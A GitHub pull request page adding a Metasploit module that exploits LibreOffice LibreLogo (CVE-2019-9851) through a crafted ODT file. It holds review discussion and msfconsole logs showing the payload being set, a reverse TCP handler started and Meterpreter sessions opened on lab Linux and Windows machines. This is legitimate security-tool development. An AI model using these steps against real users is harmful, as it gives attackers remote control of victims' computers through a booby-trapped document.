Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add LibreOffice LibreLogo exec exploit Module (CVE-2019-9851) #12207

Merged
merged 22 commits into from
Aug 19, 2019
Merged

Add LibreOffice LibreLogo exec exploit Module (CVE-2019-9851) #12207

merged 22 commits into from
Aug 19, 2019

Conversation

LoadLow
Copy link
Contributor

@LoadLow LoadLow commented Aug 16, 2019
edited
Loading

Follows #12147

Resolves #12103

Exploit written 17 days ago, before CVE-2019-9851 was publicly announced/disclosed.

LoadLow and others added 13 commits July 30, 2019 23:07
@LoadLow
Adds exploit module for CVE-2019-9848
5f478b7 
uses on dom-loaded event (triggered just after opening the document) and still working on 6.2.5
@LoadLow
Adds documentation for libreoffice_logo_exec
b2dcaf6
@LoadLow
Updates documentation for libreoffice_logo_exec
97589e5
@LoadLow
Updates references
88f3ff9
@LoadLow
Fixes indent
8e8e6a2
@LoadLow @bcoles
Update libreoffice_logo_exec documentation
009e2af 
Co-Authored-By: bcoles <bcoles@gmail.com>
@LoadLow @cbrnrd
Update libreoffice_logo_exec documentation
5e2463c 
Co-Authored-By: Carter Brainerd <0xCB@protonmail.com>
@LoadLow @cbrnrd
Removes double quotes in libreoffice_logo_exec
ce552ab 
Co-Authored-By: Carter Brainerd <0xCB@protonmail.com>
@LoadLow @bcoles
Update libreoffice_logo_exec documentation
dbced01 
Co-Authored-By: bcoles <bcoles@gmail.com>
@LoadLow @bcoles
Update libreoffice_logo_exec documentation
ee6c4a9 
Co-Authored-By: bcoles <bcoles@gmail.com>
@LoadLow
Adds suggested modifications
c3b6e33
@LoadLow
Update libreoffice_logo_exec.md
41822c0
@LoadLow
Update libreoffice_logo_exec.md
2432104
@LoadLow LoadLow changed the title Add LibreOffice LibreLogo exec exploit Module (CVE-2019-9848) Add LibreOffice LibreLogo exec exploit Module (CVE-2019-9851) Aug 16, 2019
@LoadLow
References next CVE with global events
7e44194
@LoadLow
Adds references to the next CVE
3838fc2 
This new CVE explains this exploit (global events are used)
@space-r7 space-r7 self-assigned this Aug 16, 2019
@space-r7
Copy link
Contributor

Is there a reason to use ARCH_CMD payloads rather than ARCH_PYTHON ?

I ask, because this is a file format exploit, and there's no guarantee the user will open the
document on the correct platform. Comparatively, if you're already executing native Python
code, you could use a Python payload, which should effectively be universal, and execute
regardless of the target platform.

Hi, @LoadLow! I made a PR on your branch that includes changes so your module can use Python payloads. The module works for both Windows and Linux , but an error window now pops up once your Meterpreter session is closed. There might be a specific setting for the python/meterpreter/reverse_tcp payload that could fix it, but I didn't look too deeply into that. Please let me know if those changes work for you!

@LoadLow
Merge pull request #1 from space-r7/pr12207-changes
6483b97 
Use Python instead of platform-dependent code
@LoadLow
Adds default options
b0a5319 
- Changes target to Automatic
- Set default options instead of default target for options
- Adds links for the two vulnerabilities exploited by this module
- Removes unnecessary double encoding+eval
@LoadLow
Updates scenarios
6b4acbc
@LoadLow
Copy link
Contributor Author

LoadLow commented Aug 18, 2019

Hi @space-r7 !
It works like a charm, thank you !

I have changed some options and it should now work without this error popup.

@bcoles
Copy link
Contributor

bcoles commented Aug 18, 2019
edited
Loading

Tested automatic targeting with Python payload on Linux Mint 19 using the latest commit at the time (Adds default options). I didn't encounter any popups.

msf5 exploit(multi/fileformat/libreoffice_logo_exec) > set payload python/meterpreter/reverse_tcp
payload => python/meterpreter/reverse_tcp
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > set wfsdelay 600
wfsdelay => 600
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > set disablepayloadhandler false
disablepayloadhandler => false
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] File generated! Now you need to move the odt file and find a way to send it/open it with LibreOffice on the target.
[+] librefile.odt stored at /root/.msf4/local/librefile.odt
[*] Sending stage (53755 bytes) to 172.16.191.211
[*] Meterpreter session 1 opened (172.16.191.165:4444 -> 172.16.191.211:44392) at 2019-08-18 09:16:16 -0400

meterpreter > getuid
Server username: user
meterpreter > sysinfo
Computer        : linux-mint-19-2
OS              : Linux 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018
Architecture    : x64
System Language : en_AU
Meterpreter     : python/linux
meterpreter >

I performed a little experimentation, but nothing thorough. I noticed that exploitation seemed to be a little unreliable. However, this was likely due to alt-tabbing out of the test VM during exploitation, preventing the mousemove event from firing. This is unlikely to be an issue in practice.

There's also the issue of leaving lingering soffice.bin processes, even after both LibreOffice and the shell session have been closed. There's probably not a lot that can be done to prevent this.

$ ps aux | grep libre
user      8321  0.0  0.0 1343484  864 ?        Ss   23:26   0:00 /usr/lib/libreoffice/program/soffice.bin --writer file:///home/user/Desktop/asdf.odt --splash-pipe=5
user      8370  0.0  2.7 1344052 27504 ?       Ss   23:27   0:00 /usr/lib/libreoffice/program/soffice.bin --writer file:///home/user/Desktop/asdf.odt --splash-pipe=5
user      8419  0.0 13.0 1346600 131976 ?      Ss   23:27   0:00 /usr/lib/libreoffice/program/soffice.bin --writer file:///home/user/Desktop/asdf.odt --splash-pipe=5
user      8434  0.0  0.1  14428  1024 pts/4    S+   23:29   0:00 grep --color=auto libre

Out of ~20 exploitation attempts, I encountered one system freeze, rendering X unresponsive, which required switching to TTY1 to kill off the soffice.bin processes. This happened only once, and was probably due to my test environment and behavior (ie, switching between VMs, multiple dangling processes from multiple exploitation attempts, exploitation attempts without a suitable listener, multiple exploitation attempts using the same file name, which had since been overwritten/deleted, etc).

Edit: Also, apparently my system ran out of memory which probably wouldn't have helped.

52962.018240] Out of memory: Kill process 7340 (soffice.bin) score 65 or sacrifice child
[352962.018263] Killed process 7340 (soffice.bin) total-vm:1344520kB, anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
[352965.699717] audit: type=1400 audit(1566134656.330:1603): apparmor="ALLOWED" operation="exec" profile="libreoffice-soffice" name="/bin/uname" pid=8016 comm="sh" requested_mask="x" denied_mask="x" fsuid=1000 ouid=0 target="libreoffice-soffice//null-/bin/uname"

@LoadLow
Copy link
Contributor Author

LoadLow commented Aug 18, 2019
edited
Loading

Thank you for the feedback !

It seems it is heavier than when we were executing a subprocess with the payload exec by calling os.system.
Also, the session is closed when the document is closed (PrependMigrate ignored ?).
But whatever, it is working.

@LoadLow
Cleanup odt metadata
e6b72b5 
Metadata part is not mandatory on ODT files
@LoadLow
Marks the generated ODT file readonly
9b1a3b4 
Prevents autosave and further modifications after opening the document on the target system.
@LoadLow
@LoadLow Marks the generated ODT file readonly
dc07b78
@space-r7
Copy link
Contributor

Also, the session is closed when the document is closed (PrependMigrate ignored ?).

PrependMigrate is specific to Windows payloads, so it is being ignored in this case. (I forgot to remove it.) @bcoles, do you have any more improvements in mind? I can remove the PrependMigrate option before landing.

@bcoles
Copy link
Contributor

bcoles commented Aug 19, 2019

Also, the session is closed when the document is closed (PrependMigrate ignored ?).

PrependMigrate is specific to Windows payloads, so it is being ignored in this case. (I forgot to remove it.) @bcoles, do you have any more improvements in mind? I can remove the PrependMigrate option before landing.

Without looking into it, or testing the changes since Adds default options commit, I don't have any specific improvements in mind.

For what it's worth, the session doesn't die when I close the document - not sure if that behavior was introduced in the newer commits?

@space-r7
Copy link
Contributor

For what it's worth, the session doesn't die when I close the document - not sure if that behavior was introduced in the newer commits?

Just tested the latest commits on both Windows and Linux. The session dies upon closing LibreOffice on Windows, but stays alive when the file is closed on Linux. It looks like the MeterpreterTryToFork option functionality that's set to true by default won't work on Windows currently, so it looks like we lost that after changing to Python payloads.

@bcoles
Copy link
Contributor

bcoles commented Aug 19, 2019

it looks like we lost that after changing to Python payloads.

Welp. The original targets could be added back in, leaving python as the default. But I'm happy with the module as is.

@space-r7
Copy link
Contributor

Welp. The original targets could be added back in, leaving python as the default. But I'm happy with the module as is.

Will keep the single Python target as exploitation is much more likely if the target is unknown. Will see if there is any potential for extending the MeterpreterTryToFork to Windows. Thanks, @bcoles!

@space-r7
Copy link
Contributor

Tested on Windows and Linux with the latest changes:

msf5 > use exploit/multi/fileformat/libreoffice_logo_exec 
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > run

[*] File generated! Now you need to move the odt file and find a way to send it/open it with LibreOffice on the target.
[+] librefile.odt stored at /Users/space/.msf4/local/librefile.odt
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > handler -H 192.168.37.1 -P 4444 -p python/meterpreter/reverse_tcp
[*] Payload handler running as background job 0.

[*] Started reverse TCP handler on 192.168.37.1:4444 
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > [*] Sending stage (53755 bytes) to 192.168.37.143
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.143:60316) at 2019-08-19 13:09:59 -0500
[*] Sending stage (53755 bytes) to 192.168.37.147
[*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.147:49690) at 2019-08-19 13:10:15 -0500

msf5 exploit(multi/fileformat/libreoffice_logo_exec) > sessions

Active sessions
===============

  Id  Name  Type                        Information                                    Connection
  --  ----  ----                        -----------                                    ----------
  1         meterpreter python/linux    space @ ubuntu                                 192.168.37.1:4444 -> 192.168.37.143:60316 (192.168.37.143)
  2         meterpreter python/windows  DESKTOP-L5FDSM7\Shelby Pace @ DESKTOP-L5FDSM7  192.168.37.1:4444 -> 192.168.37.147:49690 (192.168.37.147)

msf5 exploit(multi/fileformat/libreoffice_logo_exec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : ubuntu
OS              : Linux 4.18.0-15-generic #16~18.04.1-Ubuntu SMP Thu Feb 7 14:06:04 UTC 2019
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.37.143 - Meterpreter session 1 closed.  Reason: User exit
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        : DESKTOP-L5FDSM7
OS              : Windows 10 (Build 16299)
Architecture    : x64
System Language : en_US
Meterpreter     : python/windows

space-r7 added a commit that referenced this pull request Aug 19, 2019
@space-r7
Land #12207, add LibreOffice/Logo file fmt exploit
bc6cff3
@space-r7 space-r7 merged commit dc07b78 into rapid7:master Aug 19, 2019
msjenkins-r7 pushed a commit that referenced this pull request Aug 19, 2019
@space-r7 @msjenkins-r7
Land #12207, add LibreOffice/Logo file fmt exploit
040a3c6
@LoadLow LoadLow deleted the libreoffice_librelogo_exec branch August 19, 2019 18:26
@space-r7
Copy link
Contributor

space-r7 commented Aug 19, 2019
edited by tdoan-r7
Loading

Release Notes

The LibreOffice LibreLogo Exec module has been added to the framework. It exploits a vulnerability in LibreLogo when bundled with LibreOffice. This module generates an ODT file with a global DOM loaded event that when triggered, will execute any arbitrary Python code.

@tdoan-r7 tdoan-r7 added the rn-modules release notes for new or majorly enhanced modules label Sep 5, 2019
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@space-r7 space-r7

Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

LibreOffice - LibreLogo arbitrary script execution (CVE-2019-9848)
4 participants
@LoadLow @space-r7 @bcoles @tdoan-r7